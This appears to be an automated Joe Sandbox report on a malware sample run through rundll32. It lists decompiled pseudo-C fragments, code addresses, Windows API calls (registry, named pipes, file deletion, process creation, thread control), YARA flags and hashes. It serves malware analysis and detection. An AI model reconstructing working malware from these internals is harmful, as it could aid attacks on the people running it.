						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E03436C2C(_t171);
					}
					if(_v8 != 0x10d2) {
						L18:
						if(_v8 == 0) {
							_t117 = _v16;
							if(_t117 != 0) {
								_t118 =  *_t117;
								_t169 =  *_v12;
								_v16 = _t118;
								wcstombs(_t118, _t118,  *_v12);
								 *_v24 = E03433C22(_v16, _v16, _t169 >> 1);
							}
						}
						goto L21;
					} else {
						if(_v16 != 0) {
							L21:
							E03436C2C(_v32);
							if(_v12 == 0 || _v8 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L18;
					}
				}
			}




























































                                0x0343300e
                                0x0343300e
                                0x03433012
                                0x03433019
                                0x03433023
                                0x03433025
                                0x03433025
                                0x03433032
                                0x0343303d
                                0x03433040
                                0x0343304b
                                0x0343304e
                                0x03433053
                                0x03433056
                                0x0343305b
                                0x0343305e
                                0x0343306a
                                0x03433077
                                0x03433079
                                0x0343307f
                                0x03433084
                                0x0343308f
                                0x03433091
                                0x03433094
                                0x0343309b
                                0x0343309d
                                0x034330a6
                                0x034330b1
                                0x034330b3
                                0x034330b6
                                0x034330b6
                                0x034330b8
                                0x034330bd
                                0x034330c5
                                0x034330c9
                                0x034330cf
                                0x034330d8
                                0x034330da
                                0x034330dd
                                0x034330df
                                0x034330ea
                                0x034330f0
                                0x034330f3
                                0x034330f8
                                0x03433103
                                0x03433105
                                0x0343310c
                                0x03433116
                                0x03433116
                                0x03433118
                                0x0343311d
                                0x03433123
                                0x03433126
                                0x0343312b
                                0x03433135
                                0x03433137
                                0x03433146
                                0x03433146
                                0x03433148
                                0x03433156
                                0x0343315b
                                0x0343315d
                                0x03433163
                                0x03433343
                                0x0343334b
                                0x03433358
                                0x03433169
                                0x03433175
                                0x0343317b
                                0x03433181
                                0x03433336
                                0x03433341
                                0x00000000
                                0x03433341
                                0x0343318d
                                0x03433192
                                0x0343319b
                                0x034331ac
                                0x034331b0
                                0x034331b9
                                0x034331bf
                                0x034331cc
                                0x034331d9
                                0x034331df
                                0x03433329
                                0x03433334
                                0x00000000
                                0x03433334
                                0x034331eb
                                0x034331f1
                                0x034331f2
                                0x034331f7
                                0x034331fd
                                0x0343331f
                                0x03433327
                                0x00000000
                                0x03433327
                                0x03433207
                                0x0343320e
                                0x03433218
                                0x0343321e
                                0x03433228
                                0x0343323a
                                0x0343323c
                                0x03433242
                                0x0343335b
                                0x0343330a
                                0x0343330a
                                0x0343330f
                                0x0343331b
                                0x0343331d
                                0x00000000
                                0x0343331d
                                0x0343324d
                                0x03433252
                                0x03433258
                                0x03433263
                                0x0343326e
                                0x03433272
                                0x03433278
                                0x0343327e
                                0x03433284
                                0x03433287
                                0x0343328d
                                0x03433290
                                0x03433295
                                0x03433299
                                0x03433299
                                0x034332a6
                                0x034332b4
                                0x034332b9
                                0x034332bb
                                0x034332c1
                                0x034332c7
                                0x034332c9
                                0x034332ce
                                0x034332d2
                                0x034332ee
                                0x034332ee
                                0x034332c1
                                0x00000000
                                0x034332a8
                                0x034332ad
                                0x034332f0
                                0x034332f4
                                0x034332fe
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x034332fe
                                0x034332af
                                0x00000000
                                0x034332af
                                0x034332a6

                                APIs
                                • GetTickCount.KERNEL32 ref: 03433025
                                • wsprintfA.USER32 ref: 03433072
                                • wsprintfA.USER32 ref: 0343308F
                                • wsprintfA.USER32 ref: 034330B1
                                • wsprintfA.USER32 ref: 034330D8
                                • wsprintfA.USER32 ref: 03433103
                                • HeapFree.KERNEL32(00000000,?), ref: 03433116
                                • wsprintfA.USER32 ref: 03433135
                                • HeapFree.KERNEL32(00000000,?), ref: 03433146
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03433175
                                • GetTickCount.KERNEL32 ref: 03433187
                                • RtlEnterCriticalSection.NTDLL(055E9570), ref: 0343319B
                                • RtlLeaveCriticalSection.NTDLL(055E9570), ref: 034331B9
                                  • Part of subcall function 03431D33: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,75BCC740,034358D7,00000000,055E95B0), ref: 03431D5E
                                  • Part of subcall function 03431D33: lstrlen.KERNEL32(00000000,?,75BCC740,034358D7,00000000,055E95B0), ref: 03431D66
                                  • Part of subcall function 03431D33: strcpy.NTDLL ref: 03431D7D
                                  • Part of subcall function 03431D33: lstrcat.KERNEL32(00000000,00000000), ref: 03431D88
                                  • Part of subcall function 03431D33: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,034358D7,?,75BCC740,034358D7,00000000,055E95B0), ref: 03431DA5
                                • StrTrimA.SHLWAPI(00000000,0343928C,?,055E95B0), ref: 034331EB
                                  • Part of subcall function 0343393C: lstrlen.KERNEL32(055E9B68,00000000,00000000,00000000,03435902,00000000), ref: 0343394C
                                  • Part of subcall function 0343393C: lstrlen.KERNEL32(?), ref: 03433954
                                  • Part of subcall function 0343393C: lstrcpy.KERNEL32(00000000,055E9B68), ref: 03433968
                                  • Part of subcall function 0343393C: lstrcat.KERNEL32(00000000,?), ref: 03433973
                                • lstrcpy.KERNEL32(00000000,?), ref: 0343320E
                                • lstrcpy.KERNEL32(?,?), ref: 03433218
                                • lstrcat.KERNEL32(?,?), ref: 03433228
                                • lstrcat.KERNEL32(?,00000000), ref: 0343322F
                                  • Part of subcall function 034361FC: lstrlen.KERNEL32(?,00000000,055E9D70,00000000,034339E8,055E9F93,69B25F44,?,?,?,?,69B25F44,00000005,0343A00C,4D283A53,?), ref: 03436203
                                  • Part of subcall function 034361FC: mbstowcs.NTDLL ref: 0343622C
                                  • Part of subcall function 034361FC: memset.NTDLL ref: 0343623E
                                • wcstombs.NTDLL ref: 034332D2
                                  • Part of subcall function 03435B9D: SysAllocString.OLEAUT32(?), ref: 03435BD8
                                  • Part of subcall function 03436C2C: RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                • HeapFree.KERNEL32(00000000,?), ref: 0343331B
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 03433327
                                • HeapFree.KERNEL32(00000000,?,?,055E95B0), ref: 03433334
                                • HeapFree.KERNEL32(00000000,?), ref: 03433341
                                • HeapFree.KERNEL32(00000000,?), ref: 0343334B
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$wsprintf$lstrlen$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                • String ID:
                                • API String ID: 967369141-0
                                • Opcode ID: 415fdb58a7f1ad7868ac639d6647fcd2ce3c619b58787d0f146d579d4445703d
                                • Instruction ID: 490befa98d894a67dfee2cd93d39c5a64e2c7ae55c32a9c7e9f5c9a26bb23034
                                • Opcode Fuzzy Hash: 415fdb58a7f1ad7868ac639d6647fcd2ce3c619b58787d0f146d579d4445703d
                                • Instruction Fuzzy Hash: 21A16775504304AFCB11EF65DC88E9ABBE8EB89714F090929F888EB260CB35D855CB56
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348CEB7 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 219memoryfilestringCOMMON
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32 ref: 0348CED3
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0348CEEF
                                • GetLastError.KERNEL32 ref: 0348CF3E
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0348CF54
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0348CF68
                                • GetLastError.KERNEL32 ref: 0348CF82
                                • GetLastError.KERNEL32 ref: 0348CFB5
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0348CFD3
                                • lstrlenW.KERNEL32(00000000,?), ref: 0348CFFF
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0348D014
                                • DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 0348D0E8
                                • HeapFree.KERNEL32(00000000,?), ref: 0348D0F7
                                • WaitForSingleObject.KERNEL32(00000000), ref: 0348D10C
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0348D11F
                                • HeapFree.KERNEL32(00000000,?), ref: 0348D131
                                • RtlExitUserThread.NTDLL(?,?), ref: 0348D146
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
                                • String ID:
                                • API String ID: 3853681310-3916222277
                                • Opcode ID: 847078a2eb65f298a06d4b9a50330a3e6248fd3c97b21e577cd3688c76ab7ffa
                                • Instruction ID: c68d599cfc4f2107899c58badab5123392b85f5b26e1660ce1a6dcd35543b988
                                • Opcode Fuzzy Hash: 847078a2eb65f298a06d4b9a50330a3e6248fd3c97b21e577cd3688c76ab7ffa
                                • Instruction Fuzzy Hash: 15813771900209AFDB11EFA5DC89EAEBBFCEB0A304F15046BF605EB294D7349945DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03472C62 Relevance: 27.3, APIs: 18, Instructions: 275memorystringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03491ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F02
                                  • Part of subcall function 03491ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 03491F16
                                  • Part of subcall function 03491ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F30
                                  • Part of subcall function 03491ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,03472C89,?,?,?), ref: 03491F5A
                                • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 03472CA9
                                • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 03472CC7
                                • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?), ref: 03472CF3
                                • HeapFree.KERNEL32(00000000,00000000,0000002A,00000000,00000000,00000000,00000000,?,00000000,?,?,?), ref: 03472D62
                                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 03472DDA
                                • wsprintfA.USER32 ref: 03472DF6
                                • lstrlen.KERNEL32(00000000,00000000), ref: 03472E01
                                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 03472E18
                                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 03472EA4
                                • wsprintfA.USER32 ref: 03472EBF
                                • lstrlen.KERNEL32(00000000,00000000), ref: 03472ECA
                                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 03472EE1
                                • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000000,?,?,?), ref: 03472F03
                                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 03472F1E
                                • wsprintfA.USER32 ref: 03472F35
                                • lstrlen.KERNEL32(00000000,00000000), ref: 03472F40
                                  • Part of subcall function 03473172: lstrlen.KERNEL32(034743C6,00000000,?,?,?,?,034743C6,00000035,00000000,?,00000000), ref: 034731A2
                                  • Part of subcall function 03473172: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 034731B8
                                  • Part of subcall function 03473172: memcpy.NTDLL(00000010,034743C6,00000000,?,?,034743C6,00000035,00000000), ref: 034731EE
                                  • Part of subcall function 03473172: memcpy.NTDLL(00000010,00000000,00000035,?,?,034743C6,00000035), ref: 03473209
                                  • Part of subcall function 03473172: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 03473227
                                  • Part of subcall function 03473172: GetLastError.KERNEL32(?,?,034743C6,00000035), ref: 03473231
                                  • Part of subcall function 03473172: HeapFree.KERNEL32(00000000,00000000,?,?,034743C6,00000035), ref: 03473254
                                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 03472F57
                                • HeapFree.KERNEL32(00000000,?,0000001D,00000008,?,06168A20), ref: 03472F83
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
                                • String ID:
                                • API String ID: 3130754786-0
                                • Opcode ID: ed482388a055d99cd39a590b0b93c55a6720a68d78d33fdd7f7223246934f8c6
                                • Instruction ID: dffbf3979fde05acd1921f95691595213040273f4c94e954636c6afe7c1181ca
                                • Opcode Fuzzy Hash: ed482388a055d99cd39a590b0b93c55a6720a68d78d33fdd7f7223246934f8c6
                                • Instruction Fuzzy Hash: C2A167B1800209EFDB11EFA5DC88DAFBBB9FB19300B15486BE505BE210D7715E45DBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03481195 Relevance: 24.3, APIs: 16, Instructions: 258memorystringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(?), ref: 034811AA
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0348BB1D
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0348BB29
                                  • Part of subcall function 0348BAD1: memset.NTDLL ref: 0348BB71
                                  • Part of subcall function 0348BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0348BB8C
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(0000002C), ref: 0348BBC4
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?), ref: 0348BBCC
                                  • Part of subcall function 0348BAD1: memset.NTDLL ref: 0348BBEF
                                  • Part of subcall function 0348BAD1: wcscpy.NTDLL ref: 0348BC01
                                  • Part of subcall function 0348BAD1: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0348BC27
                                  • Part of subcall function 0348BAD1: RtlEnterCriticalSection.NTDLL(?), ref: 0348BC5D
                                  • Part of subcall function 0348BAD1: RtlLeaveCriticalSection.NTDLL(?), ref: 0348BC79
                                  • Part of subcall function 0348BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 0348BC92
                                  • Part of subcall function 0348BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 0348BCA4
                                  • Part of subcall function 0348BAD1: FindClose.KERNEL32(?), ref: 0348BCB9
                                  • Part of subcall function 0348BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0348BCCD
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(0000002C), ref: 0348BCEF
                                • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 03481206
                                • memcpy.NTDLL(00000000,?,00000000), ref: 03481219
                                • lstrcpyW.KERNEL32(00000000,?), ref: 03481230
                                  • Part of subcall function 0348BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 0348BD65
                                  • Part of subcall function 0348BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 0348BD77
                                  • Part of subcall function 0348BAD1: FindClose.KERNEL32(?), ref: 0348BD92
                                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 0348125B
                                • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 03481273
                                • HeapFree.KERNEL32(00000000,00000000), ref: 034812CD
                                • lstrlenW.KERNEL32(00000000,?), ref: 034812F0
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 03481302
                                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 03481376
                                • HeapFree.KERNEL32(00000000,?), ref: 03481386
                                  • Part of subcall function 0347AE7C: lstrlen.KERNEL32(0347E448,00000000,00000000,?,?,03487A5B,?,?,?,?,0347E448,?), ref: 0347AE8B
                                  • Part of subcall function 0347AE7C: mbstowcs.NTDLL ref: 0347AEA7
                                • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 034813AF
                                • lstrlenW.KERNEL32(0349B878,?), ref: 03481429
                                • DeleteFileW.KERNEL32(?,?), ref: 03481457
                                • HeapFree.KERNEL32(00000000,?), ref: 03481465
                                • HeapFree.KERNEL32(00000000,?), ref: 03481486
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                                • String ID:
                                • API String ID: 72361108-0
                                • Opcode ID: 8f7e274122deecd80b5c2258edcd1946b575cde755139c7bf6d1282fa313af29
                                • Instruction ID: 2d751dff711a5994e0bfcabac0ec1c2da7b4a6a66e3ff8d1b6250b25793dfeb0
                                • Opcode Fuzzy Hash: 8f7e274122deecd80b5c2258edcd1946b575cde755139c7bf6d1282fa313af29
                                • Instruction Fuzzy Hash: AF9139B1500219BFDB11EFA5EC89CAF7BECEB1A740B094457F509EF215E2309946CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03487F79 Relevance: 24.1, APIs: 16, Instructions: 131memoryregistrythreadCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 03487F9B
                                • RtlEnterCriticalSection.NTDLL(00000000), ref: 03487FB8
                                • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 03488008
                                • DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 03488012
                                • GetLastError.KERNEL32 ref: 0348801C
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0348802D
                                • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 0348804F
                                • HeapFree.KERNEL32(00000000,?), ref: 03488086
                                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0348809A
                                • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 034880A3
                                • SuspendThread.KERNEL32(?), ref: 034880B2
                                • CreateEventA.KERNEL32(0349A1E8,00000001,00000000), ref: 034880C6
                                • SetEvent.KERNEL32(00000000), ref: 034880D3
                                • CloseHandle.KERNEL32(00000000), ref: 034880DA
                                • Sleep.KERNEL32(000001F4), ref: 034880ED
                                • ResumeThread.KERNEL32(?), ref: 03488111
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
                                • String ID:
                                • API String ID: 1011176505-0
                                • Opcode ID: 1ffb776f207424ac543d480b353683df3db2eff290476e9c044aa736aa04951d
                                • Instruction ID: 02d4862f56bcd9cde452a252aa561de40446c356ef275b51f4632418dab922d7
                                • Opcode Fuzzy Hash: 1ffb776f207424ac543d480b353683df3db2eff290476e9c044aa736aa04951d
                                • Instruction Fuzzy Hash: E2417272800209EFCB11FFA5DC899AEBBF9FB16340B26406BE601BE214D7315995DB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03475437 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • memset.NTDLL ref: 03475465
                                • StrChrA.SHLWAPI(?,0000000D), ref: 034754AB
                                • StrChrA.SHLWAPI(?,0000000A), ref: 034754B8
                                • StrChrA.SHLWAPI(?,0000007C), ref: 034754DF
                                • StrTrimA.SHLWAPI(?,03495FCC), ref: 034754F4
                                • StrChrA.SHLWAPI(?,0000003D), ref: 034754FD
                                • StrTrimA.SHLWAPI(00000001,03495FCC), ref: 03475513
                                • _strupr.NTDLL ref: 0347551A
                                • StrTrimA.SHLWAPI(?,?), ref: 03475527
                                • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 0347556F
                                • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 0347558E
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                                • String ID: $;
                                • API String ID: 4019332941-73438061
                                • Opcode ID: a600f49d9921d9c78e4d36a8ee58021b91fbaa4ce3130fe6972192962f7055b9
                                • Instruction ID: 96720c4e9639e9b3e33b255f87b14ca041506d7ca9f31a8edeb677dea1df8ece
                                • Opcode Fuzzy Hash: a600f49d9921d9c78e4d36a8ee58021b91fbaa4ce3130fe6972192962f7055b9
                                • Instruction Fuzzy Hash: 8B412171508302AFD711EF29CC44B5BBBE9AF4A240F08089FF4999F345DB74D9058BAA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03482DBB Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 136timeCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 03482DF8
                                • OpenWaitableTimerA.KERNEL32(00100000,00000000,00000000), ref: 03482E0C
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,?), ref: 03482F37
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • memset.NTDLL ref: 03482E38
                                • GetLastError.KERNEL32(?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 03482E70
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateCloseErrorHandleHeapLastOpenTimerWaitablememsetwsprintf
                                • String ID: 0x%08X$W
                                • API String ID: 95801598-2600449260
                                • Opcode ID: b93e151d84ab4f9abc594695937d396294e7f2505b15e8d6d20ba4007671ae23
                                • Instruction ID: e88e489278e6e0fec151202598904a573f4c72900e03597a8e0325d92dff3238
                                • Opcode Fuzzy Hash: b93e151d84ab4f9abc594695937d396294e7f2505b15e8d6d20ba4007671ae23
                                • Instruction Fuzzy Hash: D85191B1500705AFDB11EF65C845BAEBBE8FF09314F20851AF959EE280D7B4D544CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348C01F Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121processstringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.NTDLL ref: 0348C034
                                  • Part of subcall function 0347AE7C: lstrlen.KERNEL32(0347E448,00000000,00000000,?,?,03487A5B,?,?,?,?,0347E448,?), ref: 0347AE8B
                                  • Part of subcall function 0347AE7C: mbstowcs.NTDLL ref: 0347AEA7
                                • lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0348C06D
                                • wcstombs.NTDLL ref: 0348C077
                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0348C0A8
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0347A645), ref: 0348C0D4
                                • TerminateProcess.KERNEL32(?,000003E5), ref: 0348C0EA
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0347A645), ref: 0348C0FE
                                • GetLastError.KERNEL32 ref: 0348C102
                                • GetExitCodeProcess.KERNEL32(?,00000001), ref: 0348C122
                                • CloseHandle.KERNEL32(?), ref: 0348C131
                                • CloseHandle.KERNEL32(?), ref: 0348C136
                                • GetLastError.KERNEL32 ref: 0348C13A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
                                • String ID: D
                                • API String ID: 2463014471-2746444292
                                • Opcode ID: 5d89ee0326330400c46221697f9d24b6ee387589970b6aecc1ae0286a4954a00
                                • Instruction ID: b73334694bedeeedfd369024c6975b76ea37abb71936877611b456b5cf37b858
                                • Opcode Fuzzy Hash: 5d89ee0326330400c46221697f9d24b6ee387589970b6aecc1ae0286a4954a00
                                • Instruction Fuzzy Hash: 4041E7B5D00218BFDB12FFA5CDC59EEFBBCEB09244F2444AAE501BA200D6715E458BB4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034744A6 Relevance: 21.4, APIs: 14, Instructions: 391memorythreadCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 03474526
                                • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 03474545
                                • GetLastError.KERNEL32 ref: 034746F6
                                • GetLastError.KERNEL32 ref: 03474778
                                • SwitchToThread.KERNEL32(?,?,?,?), ref: 034747C1
                                • GetLastError.KERNEL32 ref: 03474813
                                • GetLastError.KERNEL32 ref: 03474822
                                • RtlEnterCriticalSection.NTDLL(?), ref: 03474832
                                • RtlLeaveCriticalSection.NTDLL(?), ref: 03474843
                                • RtlExitUserThread.NTDLL(?), ref: 03474851
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 034748C0
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03474911
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 03474946
                                • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 03474956
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHeapLast$AllocAllocateCriticalFreeSectionThreadVirtual$EnterExitLeaveSwitchUser
                                • String ID:
                                • API String ID: 2794784202-0
                                • Opcode ID: 7f9cf6594ee644d4e4dc9d249e7c5eba763d840120e430416511759dd89de448
                                • Instruction ID: df4ef7cb0b1ec16f02e47b9e74fbbaf8f8db52392d895b44caada93ceb9cc502
                                • Opcode Fuzzy Hash: 7f9cf6594ee644d4e4dc9d249e7c5eba763d840120e430416511759dd89de448
                                • Instruction Fuzzy Hash: 61E14AB5500249AFEB20EF66CC88EEABBEDFF09304F24456AF915DA260D73099548F54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347BFF0 Relevance: 21.2, APIs: 14, Instructions: 205memorystringthreadCOMMON
                                Download Yara Rule
                                APIs
                                • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,034885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 0347C03F
                                • StrTrimA.SHLWAPI(00000001,?,?,00000000,034885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?), ref: 0347C058
                                • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,034885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 0347C063
                                • StrTrimA.SHLWAPI(00000001,?,?,00000000,034885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?), ref: 0347C07C
                                • lstrlen.KERNEL32(00000000,?,00000001,?,?,00000000,?,00000000,034885F1,?,00000000,0000001E,00000001,00000057,?,?), ref: 0347C11F
                                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0347C141
                                • lstrcpy.KERNEL32(00000020,?), ref: 0347C160
                                • lstrlen.KERNEL32(?,?,00000000,034885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?,00000000), ref: 0347C16A
